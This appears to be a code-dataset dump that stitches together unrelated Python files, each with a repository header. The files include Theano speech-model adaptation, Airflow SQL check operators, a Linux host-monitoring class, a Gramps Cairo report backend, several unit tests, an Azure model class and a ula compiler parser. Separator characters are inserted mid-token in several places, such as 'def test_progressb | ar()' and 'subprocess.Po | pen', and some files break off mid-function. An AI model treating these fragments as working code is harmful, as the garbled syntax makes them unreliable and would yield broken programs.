dnn = CNN_SAT(numpy_rng=numpy_rng, theano_rng = theano_rng, cfg_si = cfg_si, cfg_adapt = cfg_adapt)
# read the initial DNN (the SI DNN which has been well trained)
# _file2nnet(dnn.cnn_si.layers, filename = init_model_file)
_file2nnet(dnn.cnn_si.layers, filename = 'BKUP/nnet.param.si')
_file2nnet(dnn.dnn_adapt.layers, filename = 'BKUP/nnet.param.adapt')
# get the training and validation functions for adaptation network training
dnn.params = dnn.dnn_adapt.params # only update the parameters of the i-vector nnet
dnn.delta_params = dnn.dnn_adapt.delta_params
log('> ... getting the finetuning functions for iVecNN')
train_fn, valid_fn = dnn.build_finetune_functions(
(cfg_si.train_x, cfg_si.train_y), (cfg_si.valid_x, cfg_si.valid_y),
batch_size = cfg_adapt.batch_size)
log('> ... learning the adaptation network')
cfg = cfg_adapt
while (cfg.lrate.get_rate() != 0):
# one epoch of sgd training
# train_error = train_sgd_verbose(train_fn, cfg_si.train_sets, cfg_si.train_xy,
# cfg.batch_size, cfg.lrate.get_rate(), cfg.momentum)
# log('> epoch %d, training error %f ' % (cfg.lrate.epoch, 100*numpy.mean(train_error)) + '(%)')
# validation
valid_error = validate_by_minibatch_verbose(valid_fn, cfg_si.valid_sets, cfg_si.valid_xy, cfg.batch_size)
log('> epoch %d, lrate %f, validation error %f ' % (cfg.lrate.epoch, cfg.lrate.get_rate(), 100*numpy.mean(valid_error)) + '(%)')
cfg.lrate.get_next_rate(current_error = 100 * numpy.mean(valid_error))
cfg.lrate.rate = 0
# save the model and network configuration
if cfg.param_output_file != '':
_nnet2file(dnn.dnn_adapt.layers, filename = cfg.param_output_file + '.adapt',
input_factor = cfg_adapt.input_dropout_factor, factor = cfg_adapt.dropout_factor)
_nnet2file(dnn.cnn_si.layers, filename = cfg.param_output_file + '.si',
input_factor = cfg_si.input_dropout_factor, factor = cfg_si.dropout_factor)
log('> ... the final PDNN model parameter is ' + cfg.param_output_file + ' (.si, .adapt)')
if cfg.cfg_output_file != '':
_cfg2file(cfg_adapt, filename=cfg.cfg_output_file + '.adapt')
_cfg2file(cfg_si, filename=cfg.cfg_output_file + '.si')
log('> ... the final PDNN model config is ' + cfg.cfg_output_file + ' (.si, .adapt)')
# output the model into Kaldi-compatible format
if cfg.kaldi_output_file != '':
dnn.cnn_si.fc_dnn.write_model_to_kaldi(cfg.kaldi_output_file + '.si')
dnn.dnn_adapt.write_model_to_kaldi(cfg.kaldi_output_file + '.adapt', with_softmax = False)
log('> ... the final Kaldi model is ' + cfg.kaldi_output_file + ' (.si, .adapt)')
|
rizar/attention-lvcsr | libs/blocks/tests/extensions/test_progressbar.py | Python | mit | 1,721 | 0 | import numpy
import theano
from fuel.datasets import IterableDataset
from theano import tensor
from blocks.algorithms import GradientDescent, Scale
from blocks.extensions import FinishAfter, ProgressBar, Printing
from blocks.main_loop import MainLoop
from blocks.utils import shared_floatx
def setup_mainloop(extension):
"""Set up a simple main loop for progress bar tests.
Create a MainLoop, register the given extension, supply it with a
DataStream and a minimal model/cost to optimize.
"""
# Since progressbar2 3.6.0, the `maxval` kwarg has been replaced by
# `max_value`, which has a default value of 100. If we're still using
# `maxval` by accident, this test should fail complaining that
# the progress bar has received a value out of range.
features = [numpy.array(f, dtype=theano.config.floatX)
for f in [[1, 2]] * 101]
dataset = IterableDataset(dict(features=features))
W = shared_floatx([0, 0], name='W')
x = tensor.vector('features')
cost = tensor.sum((x-W)**2)
cost.name = "cost"
algorithm = GradientDescent(cost=cost, parameters=[W],
step_rule=Scale(1e-3))
main_loop = MainLoop(
model=None, data_stream=dataset.get_example_stream(),
algorithm=algorithm,
extensions=[
FinishAfter(after_n_epochs=1),
extension])
| return main_loop
def test_progressb | ar():
main_loop = setup_mainloop(ProgressBar())
# We are happy if it does not crash or raise any exceptions
main_loop.run()
def test_printing():
main_loop = setup_mainloop(Printing())
# We are happy if it does not crash or raise any exceptions
main_loop.run()
|
secisland/HostMonitor | system.py | Python | gpl-2.0 | 4,072 | 0.041307 | #!/usr/bin/env python
#coding:utf-8
import commands
import os
import base
class SystemStat(object):
'系统基本性能数据收集'
def __init__(self,interval = 30 , cpu_core = True ):
self.interval = interval
self.cpu_core = cpu_core
def _read_cpu_usage(self):
'''
从/proc/stat 读取CPU状态
返回值为列表: [ ['cpu', 'total_value','use_value'] , ['cpu0', 'total_value','use_value'], ...]
'''
ret = []
lines = open("/proc/stat").readlines()
for line in lines:
l = line.split()
if len(l) < 5:
continue
if l[0].strip().startswith('cpu'):
total = long(l[1]) + long(l[2]) + long(l[3]) + long(l[4]) + long(l[5]) + long(l[6]) + long(l[7])
use = long(l[1]) + long(l[2]) + long(l[3])
ret.append([l[0].strip(),total,use])
return ret
def get_cpu_usage(self):
'''
计算CPU使用率
返回值为字典:{'cpu':值 , 'cpu0':值 , ...} 默认返回值CPU总体使用率不包含各个核心使用率
'''
ret = {}
stat1 = self._read_cpu_usage()
base.time.sleep(self.interval)
stat2 = self._read_cpu_usage()
if not self.cpu_core:
num = 1
else:
num = len(stat2)
for i in range(num):
cpuper = 100*((stat2[i][2] - stat1[i][2])/float(stat2[i][1] - stat1[i][1]))
ret[stat2[i][0]]= int(cpuper)
#print cpuper
#for i in ret.keys():
#print '%s 使用率: %s'%(i,ret[i])
return ret
def get_mem_usage(self):
'''获取内存使用率,返回整数的百分数'''
mem = {}
meminfo = open("/proc/meminfo").readlines()
for i in meminfo:
if len(i) < 2:
continue
name = i.split(':')[0]
value = i.split()[1]
mem[name] = long(value) / 1024.0
memper = (mem['MemTotal'] - mem['MemFree'] - mem['Buffers'] - mem['Cached'])/float(mem['MemTotal'])
return int(100*memper)
def _read_net_rate(self):
'''计算网卡接收和发送的字节数
返回值字典 {'网卡0':['接收字节','发送字节'],'网卡1':['接收字节','发送字节]}
'''
ret = {}
netinfo = open('/proc/net/dev').readlines()
for line in netinfo:
line_split = line.split(':')
if len(line_split) < 2:
continue
ret[line_split[0].strip()] = [line_split[1].split()[0]]
ret[line_split[0].strip()].append(line_split[1].split()[8])
#print 'netre:%s nettr:%s'%(netre,nettr)
return ret
def get_net_rate(self, interval = 2):
'''获取网卡速率,返回值为字典{'网卡0':'速率','网卡1':'速率'} '''
ret = {}
total1 = {}
total2 = {}
netinfo = self._read_net_rate()
for i in netinfo.keys():
total1[i] = long(netinfo[i][0]) + long(netinfo[i][1])
base.time.sleep(interval)
netinfo = se | lf._read_net_rate()
for i in netinfo.keys():
total2[i] = long(netinfo[i][0]) + long(netinfo[i][1])
for i in total2.keys():
ret[i] = ((total2[i] -total1[i])/1024.0/interval)*8
return ret
def get_load(self):
''' 获取系统5分钟内的平均负载 '''
return os.getloadavg()[0]
def ge | t_disk_usage(self):
'''获取磁盘使用率,返回字典{挂载点:百分数}'''
ret = {}
mountinfo = open('/proc/mounts').readlines()
for i in mountinfo:
mountpoint = i.split()[1].strip()
if i.split()[2].strip().startswith('ext'):
mp_info = os.statvfs(mountpoint)
mp_usage = 100*((mp_info.f_blocks - mp_info.f_bavail)/float(mp_info.f_blocks))
ret[mountpoint] = int(mp_usage)
return ret
def get_inode_usage(self):
'''获取文件系统inode使用率,返回字典{挂载点:百分数}'''
ret = {}
mountinfo = open('/proc/mounts').readlines()
for i in mountinfo:
mountpoint = i.split()[1].strip()
if i.split()[2].strip().startswith('ext'):
inode_info = os.statvfs(mountpoint)
inode_usage = 100*((inode_info.f_files - inode_info.f_favail)/float(inode_info.f_files))
ret[mountpoint] = int(inode_usage)
return ret
if __name__ == '__main__':
test = SystemStat()
print "CPU:%s"%test.get_cpu_usage()
print "Mem:%s"%test.get_mem_usage()
print "Disk:%s"%test.get_disk_usage()
print "Inode:%s"%test.get_inode_usage()
print "Net:%s"%test.get_net_rate()
print "Load:%s"%test.get_load() |
vsquare95/JiyuuBot | modules/pull.py | Python | gpl-3.0 | 353 | 0.005666 | def pull(self, command):
import subprocess
output = subprocess.Po | pen(["git", "pull"], | stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in output.stdout:
self.conman.gen_send("***Git output: %s" % line)
for line in output.stderr:
self.conman.gen_send("***Git error: %s" % line)
self._map("command", "pull", pull)
|
gilt/incubator-airflow | airflow/operators/check_operator.py | Python | apache-2.0 | 9,424 | 0.000318 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import zip
from builtins import str
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class CheckOperator(BaseOperator):
"""
Performs checks against a db. The ``CheckOperator`` expects
a sql query that will return a single row. Each value on that
first row is evaluated using python ``bool`` casting. If any of the
values return ``False`` the check is failed and errors out.
Note that Python bool casting evals the following as ``False``:
* ``False``
* ``0``
* Empty string (``""``)
* Empty list (``[]``)
* Empty dictionary or set (``{}``)
Given a query like ``SELECT COUNT(*) FROM foo``, it will fail only if
the count ``== 0``. You can craft much more complex query that could,
for instance, check that the table has the same number of rows as
the source table upstream, or that the count of today's partition is
greater than yesterday's partition, or that a set of metrics are less
than 3 standard deviation for the 7 day average.
This operator can be used as a data quality check in your pipeline, and
depending on where you put it in your DAG, you have the choice to
stop the critical path, preventing from
publishing dubious data, or on the side and receive email alerts
without stopping the progress of the DAG.
Note that this is an abstract class and get_db_hook
needs to be defined. Whereas a get_db_hook is hook that gets a
single record from an external source.
:param sql: the sql to be executed
:type sql: string
"""
template_fields = ('sql',)
template_ext = ('.hql', '.sql',)
ui_color = '#fff7e6'
@apply_defaults
def __init__(
self, sql,
conn_id=None,
*args, **kwargs):
super(CheckOperator, self).__init__(*args, **kwargs)
self.conn_id = conn_id
self.sql = sql
def execute(self, context=None):
self.log.info('Executing SQL check: %s', self.sql)
records = self.get_db_hook().get_first(self.sql)
self.log.info('Record: %s', records)
if not records:
raise AirflowException("The query returned None")
elif not all([bool(r) for r in records]):
exceptstr = "Test failed.\nQuery:\n{q}\nResults:\n{r!s}"
raise AirflowException(exceptstr.format(q=self.sql, r=records))
self.log.info("Success.")
def get_db_hook(self):
return BaseHook.get_hook(conn_id=self.conn_id)
def _convert_to_float_if_possible(s):
'''
A small helper function to convert a string to a numeric value
if appropriate
:param s: the string to be converted
:type s: str
'''
try:
ret = float(s)
except (ValueError, TypeError):
ret = s
return ret
class ValueCheckOperator(BaseOperator):
    """
    Performs a simple value check using sql code.

    Note that this is an abstract class and get_db_hook
    needs to be defined. Whereas a get_db_hook is hook that gets a
    single record from an external source.

    :param sql: the sql to be executed
    :type sql: string
    :param pass_value: the value each column of the first result row must match
    :param tolerance: optional relative tolerance for numeric comparisons
    """

    __mapper_args__ = {
        'polymorphic_identity': 'ValueCheckOperator'
    }
    template_fields = ('sql',)
    template_ext = ('.hql', '.sql',)
    ui_color = '#fff7e6'

    @apply_defaults
    def __init__(
            self, sql, pass_value, tolerance=None,
            conn_id=None,
            *args, **kwargs):
        super(ValueCheckOperator, self).__init__(*args, **kwargs)
        self.sql = sql
        self.conn_id = conn_id
        self.pass_value = _convert_to_float_if_possible(pass_value)
        tol = _convert_to_float_if_possible(tolerance)
        self.tol = tol if isinstance(tol, float) else None
        # A float pass value is compared numerically (optionally within a
        # tolerance); everything else is compared as strings.
        self.is_numeric_value_check = isinstance(self.pass_value, float)
        self.has_tolerance = self.tol is not None

    def execute(self, context=None):
        """Run ``sql`` and verify every first-row value matches ``pass_value``."""
        self.log.info('Executing SQL check: %s', self.sql)
        records = self.get_db_hook().get_first(self.sql)
        if not records:
            raise AirflowException("The query returned None")

        # Formatted via locals(), which must contain self and records.
        except_temp = ("Test failed.\nPass value:{self.pass_value}\n"
                       "Query:\n{self.sql}\nResults:\n{records!s}")
        if not self.is_numeric_value_check:
            tests = [str(r) == self.pass_value for r in records]
        else:
            try:
                num_rec = [float(r) for r in records]
            except (ValueError, TypeError):
                cvestr = "Converting a result to float failed.\n"
                raise AirflowException(cvestr + except_temp.format(**locals()))
            if self.has_tolerance:
                tests = [
                    r / (1 + self.tol) <= self.pass_value <= r / (1 - self.tol)
                    for r in num_rec]
            else:
                tests = [r == self.pass_value for r in num_rec]

        if not all(tests):
            raise AirflowException(except_temp.format(**locals()))

    def get_db_hook(self):
        # Resolve the configured connection id into a concrete database hook.
        return BaseHook.get_hook(conn_id=self.conn_id)
class IntervalCheckOperator(BaseOperator):
"""
Checks that the values of metrics given as SQL expressions are within
a certain tolerance of the ones from days_back before.
Note that this is an abstract class and get_db_hook
needs to be defined. Whereas a get_db_hook is hook that gets a
single record from an external source.
:param table: the table name
:type table: str
:param days_back: number of days between ds and the ds we want to check
against. Defaults to 7 days
:type days_back: int
:param metrics_threshold: a dictionary of ratios indexed by metrics
:type metrics_threshold: dict
"""
__mapper_args__ = {
'polymorphic_identity': 'IntervalCheckOperator'
}
template_fields = ('sql1', 'sql2')
template_ext = ('.hql', '.sql',)
ui_color = '#fff7e6'
@apply_defaults
def __init__(
        self, table, metrics_thresholds,
        date_filter_column='ds', days_back=-7,
        conn_id=None,
        *args, **kwargs):
    """Build the two comparison queries (today vs. ``days_back`` ago).

    The stray dataset-separator characters that broke the sqlt/sql2
    assignments have been removed.
    """
    super(IntervalCheckOperator, self).__init__(*args, **kwargs)
    self.table = table
    self.metrics_thresholds = metrics_thresholds
    self.metrics_sorted = sorted(metrics_thresholds.keys())
    self.date_filter_column = date_filter_column
    # Always look backwards, even if a positive days_back was given.
    self.days_back = -abs(days_back)
    self.conn_id = conn_id
    sqlexp = ', '.join(self.metrics_sorted)
    sqlt = ("SELECT {sqlexp} FROM {table}"
            " WHERE {date_filter_column}=").format(**locals())
    # Jinja-templated date literals resolved at task run time.
    self.sql1 = sqlt + "'{{ ds }}'"
    self.sql2 = sqlt + "'{{ macros.ds_add(ds, " + str(self.days_back) + ") }}'"
def execute(self, context=None):
hook = self.get_db_hook()
self.log.info('Executing SQL check: %s', self.sql2)
row2 = hook.get_first(self.sql2)
self.log.info('Executing SQL check: %s', self.sql1)
row1 = hook.get_first(self.sql1)
if not row2:
raise AirflowException("The query {q} returned None".format(q=self.sql2))
if not row1:
raise AirflowException("The query {q} returned None".format(q=self.sql1))
current = dict(zip(self.metrics_sorted, row1))
reference = dict(zip(self.metrics_sorted, row2))
ratios = {}
test_results = {}
rlog = "Ratio for {0}: {1} \n Ratio |
jralls/gramps | gramps/plugins/lib/libcairodoc.py | Python | gpl-2.0 | 62,883 | 0.003403 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2007 Zsolt Foldvari
# Copyright (C) 2009 Benny Malengier
# Copyright (C) 2009 Brian Matherly
# Copyright (C) 2010 Peter Landgren
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2011-2017 Paul Franklin
# Copyright (C) 2012 Craig Anderson
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""Report output generator based on Cairo.
"""
#------------------------------------------------------------------------
#
# Python modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
from math import radians
import re
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.plug.docgen import (BaseDoc, TextDoc, DrawDoc, ParagraphStyle,
TableCellStyle, SOLID, FONT_SANS_SERIF, FONT_SERIF,
FONT_MONOSPACE, PARA_ALIGN_CENTER, PARA_ALIGN_LEFT)
from gramps.gen.plug.report import utils
from gramps.gen.errors import PluginError
from gramps.gen.plug.docbackend import CairoBackend
from gramps.gen.utils.image import resize_to_buffer
from gramps.gui.utils import SystemFonts
#------------------------------------------------------------------------
#
# Set up logging
#
#------------------------------------------------------------------------
import logging
log = logging.getLogger(".libcairodoc")
#-------------------------------------------------------------------------
#
# Pango modules
#
#-------------------------------------------------------------------------
from gi.repository import Pango, PangoCairo
#------------------------------------------------------------------------
#
# Constants
#
#------------------------------------------------------------------------
# each element draws some extra information useful for debugging
DEBUG = False
#------------------------------------------------------------------------
#
# Font selection
#
#------------------------------------------------------------------------
_TTF_FREEFONT = {
FONT_SERIF: 'FreeSerif',
FONT_SANS_SERIF: 'FreeSans',
FONT_MONOSPACE: 'FreeMono',
}
_MS_TTFONT = {
FONT_SERIF: 'Times New Roman',
FONT_SANS_SERIF: 'Arial',
FONT_MONOSPACE: 'Courier New',
}
_GNOME_FONT = {
FONT_SERIF: 'Serif',
FONT_SANS_SERIF: 'Sans',
FONT_MONOSPACE: 'Monospace',
}
font_families = _GNOME_FONT
# FIXME debug logging does not work here.
def set_font_families():
    """Set the used font families depending on availability.
    """
    global font_families
    fonts = SystemFonts()
    family_names = fonts.get_system_fonts()
    # Preference order: GNU FreeFonts, then Microsoft TrueType fonts, then
    # the generic Gnome aliases. A set is only chosen when ALL three of its
    # faces (serif, sans, mono) are installed.
    fam = [f for f in _TTF_FREEFONT.values() if f in family_names]
    if len(fam) == len(_TTF_FREEFONT):
        font_families = _TTF_FREEFONT
        log.debug('Using FreeFonts: %s' % font_families)
        return
    fam = [f for f in _MS_TTFONT.values() if f in family_names]
    if len(fam) == len(_MS_TTFONT):
        font_families = _MS_TTFONT
        log.debug('Using MS TrueType fonts: %s' % font_families)
        return
    fam = [f for f in _GNOME_FONT.values() if f in family_names]
    if len(fam) == len(_GNOME_FONT):
        font_families = _GNOME_FONT
        log.debug('Using Gnome fonts: %s' % font_families)
        return
    # No complete set found: font_families keeps its module-level default.
    log.debug('No fonts found.')
set_font_families()
#------------------------------------------------------------------------
#
# Converter functions
#
#------------------------------------------------------------------------
def fontstyle_to_fontdescription(font_style):
    """Convert a FontStyle instance to a Pango.FontDescription one.

    Font color and underline are not implemented in Pango.FontDescription,
    and have to be set with Pango.Layout.set_attributes(attrlist) method.
    """
    weight = Pango.Weight.BOLD if font_style.get_bold() else Pango.Weight.NORMAL
    style = Pango.Style.ITALIC if font_style.get_italic() else Pango.Style.NORMAL

    description = Pango.FontDescription(font_families[font_style.face])
    description.set_size(int(round(font_style.get_size() * Pango.SCALE)))
    description.set_weight(weight)
    description.set_style(style)
    return description
def tabstops_to_tabarray(tab_stops, dpi):
    """Convert a list of tabs given in cm to a Pango.TabArray.
    """
    tab_array = Pango.TabArray.new(initial_size=len(tab_stops),
                                   positions_in_pixels=False)
    for index, tab_stop in enumerate(tab_stops):
        # cm -> Pango units: dots per inch divided by 2.54 cm per inch.
        location = tab_stop * dpi * Pango.SCALE / 2.54
        tab_array.set_tab(index, Pango.TabAlign.LEFT, int(location))
    return tab_array
def raw_length(s):
    """
    Return the length of the raw string after all pango markup has been removed.
    """
    # Strip the markup tags first, then decode the XML character entities so
    # each entity counts as the single character it renders as. (The original
    # replace() calls had been reduced to no-ops by an entity-decoding pass:
    # e.g. replace('&', '&') replaced a character with itself.)
    s = re.sub('<.*?>', '', s)
    s = s.replace('&amp;', '&')
    s = s.replace('&lt;', '<')
    s = s.replace('&gt;', '>')
    s = s.replace('&quot;', '"')
    s = s.replace('&apos;', "'")
    return len(s)
###------------------------------------------------------------------------
###
### Table row style
###
###------------------------------------------------------------------------
##class RowStyle(list):
##"""Specifies the format of a table row.
##RowStyle extents the available styles in
##The RowStyle contains the width of each column as a percentage of the
##width of the full row. Note! The width of the row is not known until
##divide() or draw() method is called.
##"""
##def __init__(self):
##self.columns = []
##def set_columns(self, columns):
##"""Set the number of columns.
##@param columns: number of columns that should be used.
##@param type: int
##"""
##self.columns = columns
##def get_columns(self):
##"""Return the number of columns.
##"""
##return self.columns
##def set_column_widths(self, clist):
##"""Set the width of all the columns at once.
##@param clist: list of width of columns in % of the full row.
##@param tyle: list
##"""
##self.columns = len(clist)
##for i in range(self.columns):
##self.colwid[i] = clist[i]
##def set_column_width(self, index, width):
##"""
##Set the width of a specified column to the specified width.
##@param index: column being set (index starts at 0)
##@param width: percentage of the table width assigned to the column
##"""
##self.colwid[index] = width
##def get_column_width(self, index):
##"""
##Return the column width of the specified column as a percentage of
##the entire table width.
##@param index: column to return (index starts at 0)
##"""
##return self.colwid[index]
class FrameStyle:
"""Define the style properties of a Frame.
- width: Width of the frame in cm.
- height: Height of the frame in cm.
- align: Horizontal position to entire page.
Available values: 'left','center', 'right'.
- spacing: Tuple of spacing around the frame in cm. Order of values:
(left, right, top, bottom).
"""
def __init__(self, width= |
bluedynamics/vdexcsv | src/vdexcsv/tests.py | Python | bsd-3-clause | 886 | 0.003386 | import unittest
import doctest
from pprint import pprint
from interlude import interact
import lxml.etree as etree
# Combined doctest option flags applied to every file in TESTFILES.
# (A stray dataset separator had split NORMALIZE_WHITESPACE in two.)
optionflags = doctest.NORMALIZE_WHITESPACE | \
    doctest.ELLIPSIS | \
    doctest.REPORT_ONLY_FIRST_FAILURE
# doctest.REPORT_NDIFF can be OR-ed in above when debugging failures.

# Doctest files executed by test_suite().
TESTFILES = [
    'api.rst',
    'script.rst',
]
def fxml(xml):
    """Parse an XML string and return it pretty-printed."""
    tree = etree.fromstring(xml)
    return etree.tostring(tree, pretty_print=True)
def pxml(xml):
    """Print the pretty-printed form of an XML string."""
    # Parenthesized call form works under both Python 2 and 3; the bare
    # `print fxml(xml)` statement is a syntax error on Python 3.
    print(fxml(xml))
def test_suite():
    """Build a suite running each doctest file with the shared helper globals.

    The stray dataset-separator character that preceded ``filename`` has
    been removed.
    """
    return unittest.TestSuite([
        doctest.DocFileSuite(
            filename,
            optionflags=optionflags,
            globs={'interact': interact,
                   'pprint': pprint,
                   'pxml': pxml},
        ) for filename in TESTFILES
    ])
if __name__ == '__main__':  # pragma NO COVERAGE
    # The suite factory in this module is named test_suite, not suite;
    # defaultTest='suite' would raise AttributeError at run time.
    unittest.main(defaultTest='test_suite')  # pragma NO COVERAGE
|
kuc2477/django-record | django_record/tests/test_mixins.py | Python | gpl-2.0 | 2,680 | 0 | from django.test import TestCase
from random import randint, uniform
from faker import Faker
from .models import TITLE_MAX_LENGTH, POINT_MAX_LENGTH, TEXT_MAX_LENGTH
from .models import Article, Comment, Vote
f = Faker()
class MixinTest(TestCase):
    """Exercise the record-keeping mixin through the Article/Comment/Vote chain.

    Stray dataset-separator characters inside setUp() and
    test_changed_save_recording() have been removed.
    """

    def setUp(self):
        # Build one Article -> Comment -> Vote chain with random content.
        article = Article.objects.create(
            title=f.text()[:TITLE_MAX_LENGTH]
        )
        comment = Comment.objects.create(
            article=article,
            point=f.text()[:POINT_MAX_LENGTH],
            text=f.text()[:TEXT_MAX_LENGTH],
            impact=randint(0, 10),
            impact_rate=uniform(0, 1)
        )
        Vote.objects.create(
            comment=comment,
            score=randint(0, 10)
        )

    def tearDown(self):
        # Cascades down to the Comment and Vote created in setUp().
        Article.objects.all().delete()

    def test_record_on_creation(self):
        # A record must be written as soon as the instance is created.
        vote = Vote.objects.first()
        self.assertTrue(vote.records.exists())

    def test_changed_save_recording(self):
        # Saving with a changed field adds exactly one record carrying
        # the new value.
        vote = Vote.objects.first()
        number_of_records_before_save = vote.records.count()

        vote.score = 999
        vote.save()
        r = vote.records.latest()

        self.assertEqual(
            number_of_records_before_save + 1,
            vote.records.count()
        )
        self.assertEqual(vote.score, r.score)

    def test_unchanged_save_recording(self):
        # Saving without changes must not add a record.
        vote = Vote.objects.first()
        number_of_records_before_save = vote.records.count()

        vote.save()
        self.assertEqual(
            number_of_records_before_save, vote.records.count()
        )

    def test_indirect_effect_recording_on_reverse_related_changed_save(self):
        # Changing a related Comment must also record the Vote, because the
        # Vote exposes a property derived from its comment.
        vote = Vote.objects.first()
        comment = vote.comment
        number_of_records_before_save = vote.records.count()
        reverse_related_property_before_save = vote.reverse_related_property

        comment.point = 'changed point in relative'
        comment.text = 'changed text in relative'
        comment.save()
        r = vote.records.latest()

        self.assertEqual(
            number_of_records_before_save + 1,
            vote.records.count()
        )
        self.assertEqual(
            vote.reverse_related_property,
            r.reverse_related_property
        )
        self.assertNotEqual(
            reverse_related_property_before_save,
            r.reverse_related_property
        )

    def test_indirect_effect_recording_on_reverse_related_unchanged_save(self):
        # An unchanged save of the related Comment must not record the Vote.
        vote = Vote.objects.first()
        comment = vote.comment
        number_of_records_before_save = vote.records.count()

        comment.save()
        self.assertEqual(number_of_records_before_save, vote.records.count())
|
lmazuel/azure-sdk-for-python | azure-servicefabric/azure/servicefabric/models/service_placement_policy_description.py | Python | mit | 1,801 | 0.00111 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ServicePlacementPolicyDescription(Model):
    """Describes the policy to be used for placement of a Service Fabric service.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: ServicePlacementInvalidDomainPolicyDescription,
    ServicePlacementNonPartiallyPlaceServicePolicyDescription,
    ServicePlacementPreferPrimaryDomainPolicyDescription,
    ServicePlacementRequiredDomainPolicyDescription,
    ServicePlacementRequireDomainDistributionPolicyDescription

    :param type: Constant filled by server.
    :type type: str
    """

    _validation = {
        'type': {'required': True},
    }

    _attribute_map = {
        'type': {'key': 'Type', 'type': 'str'},
    }

    _subtype_map = {
        'type': {'InvalidDomain': 'ServicePlacementInvalidDomainPolicyDescription', 'NonPartiallyPlaceService': 'ServicePlacementNonPartiallyPlaceServicePolicyDescription', 'PreferPrimaryDomain': 'ServicePlacementPreferPrimaryDomainPolicyDescription', 'RequireDomain': 'ServicePlacementRequiredDomainPolicyDescription', 'RequireDomainDistribution': 'ServicePlacementRequireDomainDistributionPolicyDescription'}
    }

    def __init__(self):
        super(ServicePlacementPolicyDescription, self).__init__()
        # Polymorphic discriminator; concrete subclasses set it server-side.
        self.type = None
|
mitchmyburgh/compilers_assignment | part2/ir_ula.py | Python | gpl-2.0 | 4,411 | 0.005894 | #----------------------------------------------
# ir_ula.py
#
# Intermediate representation for the ula (unconventional language)
# By Mitch Myburgh (MYBMIT001)
# 24 09 2015
#----------------------------------------------
from llvmlite import ir
from ctypes import CFUNCTYPE, c_float
import llvmlite.binding as llvm
# code for the parser
from ply import yacc
from lex_ula import tokens
import os
import sys
start = "Start"
def p_start(p):
    """Start : Program"""
    # PLY uses the docstring above as the grammar rule; do not edit it.
    p[0] = p[1]
def p_program_statements(p):
    """Program : Statements"""
    # Root of the AST: a labeled node wrapping the statement list.
    p[0] = ["Program", p[1]]
def p_statements(p):
    """Statements : Statements Statement
                  | Statement"""
    # Left-recursive list build: single statement starts the list,
    # each further statement is appended.
    if len(p) == 2:
        p[0] = [p[1]]
    else:
        p[0] = p[1] + [p[2]]
def p_statement(p):
    """Statement : ID '=' expression"""
    # Assignment node: ["=", [name], expression-subtree].
    p[0] = ["=", [p[1]], p[3]]
def p_expression_plus(p):
    """expression : expression '@' term"""
    # '@' is ula's addition operator.
    p[0] = ["@", p[1], p[3]]
def p_expression_minus(p):
    """expression : expression '$' term"""
    # '$' is ula's subtraction operator.
    p[0] = ["$", p[1], p[3]]
def p_expression_term(p):
    """expression : term"""
    # Pass-through: a lone term is an expression.
    p[0] = p[1]
def p_term_multiply(p):
    """term : term '#' factor"""
    # '#' is ula's multiplication operator.
    p[0] = ["#", p[1], p[3]]
def p_term_divide(p):
    """term : term '&' factor"""
    # '&' is ula's division operator.
    p[0] = ["&", p[1], p[3]]
def p_term_factor(p):
    """term : factor"""
    # Pass-through: a lone factor is a term.
    p[0] = p[1]
def p_factor_expression(p):
    """factor : '(' expression ')'"""
    # Parentheses only group; the inner subtree is used unchanged.
    p[0] = p[2]
def p_factor_float(p):
    """factor : FLOAT_LITERAL"""
    # Leaves are single-element lists holding the token text.
    p[0] = [p[1]]
def p_factor_id(p):
    """factor : ID"""
    # Identifier leaf, same single-element-list shape as literals.
    p[0] = [p[1]]
def p_error(p):
    # Syntax errors are silently ignored; PLY falls back to its default
    # error recovery.
    pass
def print_tree(tupletree, depth=0):
    """Recursively pretty-print a (label, children) tree, one tab per level."""
    print("\t" * depth, tupletree[0])
    for child in tupletree[1]:
        if isinstance(child, tuple):
            print_tree(child, depth + 1)
        else:
            print("\t" * (depth + 1), child)
parser = yacc.yacc()
#main function for the parser
def main():
    """Parse the .ula source file named on the command line.

    Sets the module-global ``infilename`` (later used to derive the output
    file name) and returns the syntax tree, or None on bad usage/input.
    """
    global infilename
    if len(sys.argv) == 2:
        infilename = sys.argv[1]
        if os.path.isfile(infilename):
            # Use a context manager so the handle is closed deterministically
            # (the original leaked the open file object).
            with open(infilename, "r") as infile:
                return parser.parse(infile.read())
        else:
            print("Not a valid file")
    else:
        print("Specify filename, e.g. parse_ula.ply my_program.ula")
##llvmlite stuff
last_var = "" # keeps track of the last var assigned
var_dict = {} # var names associated with memory location
def code_gen(tree):
    """Traverse the tree recursively and emit LLVM IR via the global builder.

    Returns the llvmlite value for expression nodes; assignment/program
    nodes return None. Stray dataset-separator characters in the '$' and
    '#' branches have been removed.
    """
    global last_var
